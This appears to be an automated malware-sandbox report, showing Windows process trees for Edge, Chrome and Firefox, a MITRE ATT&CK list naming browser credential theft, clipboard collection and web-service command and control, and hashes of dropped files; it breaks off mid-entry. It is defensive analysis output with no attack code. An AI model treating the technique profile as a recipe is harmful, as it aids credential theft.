  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6760 /prefetch:1
  2⤵
  PID:556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:1
  2⤵
  PID:1708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6924 /prefetch:1
  2⤵
  PID:3196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
  2⤵
  PID:1120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6836 /prefetch:1
  2⤵
  PID:2276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
  2⤵
  PID:5296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7316 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:5344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
  2⤵
  PID:6020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7216 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:3768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:1
  2⤵
  PID:428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6908 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:3008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7176 /prefetch:1
  2⤵
  PID:1016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:2556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1
  2⤵
  PID:4124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1
  2⤵
  PID:3028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6956 /prefetch:1
  2⤵
  PID:4572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:1
  2⤵
  PID:3912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7200 /prefetch:1
  2⤵
  PID:2324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
  2⤵
  PID:2220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7040 /prefetch:1
  2⤵
  PID:5232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2684 /prefetch:1
  2⤵
  PID:5900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,8867093432552871600,7186481621886830502,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7432 /prefetch:1
  2⤵
  PID:3868

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2400

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2304

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1352

C:\Users\Admin\Desktop\dnSpy.exe
"C:\Users\Admin\Desktop\dnSpy.exe"
1⤵
PID:2520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcf385cc40,0x7ffcf385cc4c,0x7ffcf385cc58
  2⤵
  PID:5016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1796,i,9705726562641056276,9398142407827752677,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1792 /prefetch:2
  2⤵
  PID:4668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2056,i,9705726562641056276,9398142407827752677,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2152 /prefetch:3
  2⤵
  PID:4380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,9705726562641056276,9398142407827752677,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2032 /prefetch:8
  2⤵
  PID:3020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,9705726562641056276,9398142407827752677,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:2368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,9705726562641056276,9398142407827752677,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:1
  2⤵
  PID:2064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4456,i,9705726562641056276,9398142407827752677,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4440 /prefetch:1
  2⤵
  PID:2220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4764,i,9705726562641056276,9398142407827752677,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4776 /prefetch:8
  2⤵
  PID:3304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4796,i,9705726562641056276,9398142407827752677,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4804 /prefetch:8
  2⤵
  PID:1564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4804,i,9705726562641056276,9398142407827752677,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5068 /prefetch:8
  2⤵
  PID:1076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5084,i,9705726562641056276,9398142407827752677,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5088 /prefetch:8
  2⤵
  PID:2028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5192,i,9705726562641056276,9398142407827752677,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5200 /prefetch:8
  2⤵
  PID:5036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5104,i,9705726562641056276,9398142407827752677,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4776 /prefetch:8
  2⤵
  PID:2028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5568,i,9705726562641056276,9398142407827752677,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5384 /prefetch:2
  2⤵
  PID:1672

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1544

C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=517009
  2⤵
  PID:4576
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd09613cb8,0x7ffd09613cc8,0x7ffd09613cd8
    3⤵
    PID:4888

C:\Users\Admin\Desktop\New folder\rar.exe
"C:\Users\Admin\Desktop\New folder\rar.exe"
1⤵
PID:5876

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5552

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4876

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5336

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:640

C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2572

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4944

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3176

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2084

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2396
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Desktop\New folder\PYZ-00.pyz_extracted\_pydecimal.pyc"
  2⤵
  PID:2516
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Desktop\New folder\PYZ-00.pyz_extracted\_pydecimal.pyc"
    3⤵
    - Checks processor information in registry
    PID:5980
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1992 -parentBuildID 20240401114208 -prefsHandle 1920 -prefMapHandle 1468 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d103f2a3-335a-4295-a92b-1179b6ae1e5a} 5980 "\\.\pipe\gecko-crash-server-pipe.5980" gpu
      4⤵
      PID:2032
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2388 -prefMapHandle 2384 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e7ad867-11ce-4a95-b725-397415ecd58f} 5980 "\\.\pipe\gecko-crash-server-pipe.5980" socket
      4⤵
      Checks processor information in registry
      PID:5188
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3384 -childID 1 -isForBrowser -prefsHandle 3428 -prefMapHandle 3344 -prefsLen 24739 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca2be514-e764-4e3d-af2a-dda91f0b5c36} 5980 "\\.\pipe\gecko-crash-server-pipe.5980" tab
      4⤵
      PID:4416
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3228 -childID 2 -isForBrowser -prefsHandle 3556 -prefMapHandle 3552 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0a0dabc-917e-482f-bcb6-3ddf399c8186} 5980 "\\.\pipe\gecko-crash-server-pipe.5980" tab
      4⤵
      PID:1032
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4140 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4008 -prefMapHandle 4184 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f06d30cb-f3a4-4f87-be5b-1b934ecad00e} 5980 "\\.\pipe\gecko-crash-server-pipe.5980" utility
      4⤵
      Checks processor information in registry
      PID:3404
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5484 -childID 3 -isForBrowser -prefsHandle 5556 -prefMapHandle 5552 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1fc9a2ef-2c21-4a9b-81af-ed83080d6440} 5980 "\\.\pipe\gecko-crash-server-pipe.5980" tab
      4⤵
      PID:2736
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5684 -childID 4 -isForBrowser -prefsHandle 5692 -prefMapHandle 5696 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02bed6ec-0293-4594-bd75-a4588ae9578d} 5980 "\\.\pipe\gecko-crash-server-pipe.5980" tab
      4⤵
      PID:4700
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5964 -childID 5 -isForBrowser -prefsHandle 5884 -prefMapHandle 5888 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0dc864b9-29de-4e3c-aea0-a65f8d2ae1d6} 5980 "\\.\pipe\gecko-crash-server-pipe.5980" tab
      4⤵
      PID:1436

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
85c3b107258f3b571f8fd5f49f171173

SHA1
6185003eaf53d936684c7ef973f60e31a859133d

SHA256
97691f6fb324e9311106e92840389b6bf9a390e28fe6510dcb6936bc83d7640f

SHA512
78f8648985f7268837c4ccb5e962ab77bc9a1c41a5718007ad48c8c6017992ab0738c26d18b8c1f92f212322f6fdade04a031b04d06f9a4b92eb87f82557c014

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
c61bc54e7461d8e1a21cc4a0505ca6a7

SHA1
19a88b7b7acfc6f4245f7217cac06697b77dfa6b

SHA256
fee9b831f27a00d44a6e90d918a226efed6cc72da9ec3a3ba19353bf26406510

SHA512
8eaaa84ec7ecededc97d2c4bf42f7797745ff8463d5d73833148c2163f0af10fbdbd5d408b61105984272b5a34f93e3d357057903f1022e9f2a83009f8a97de5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
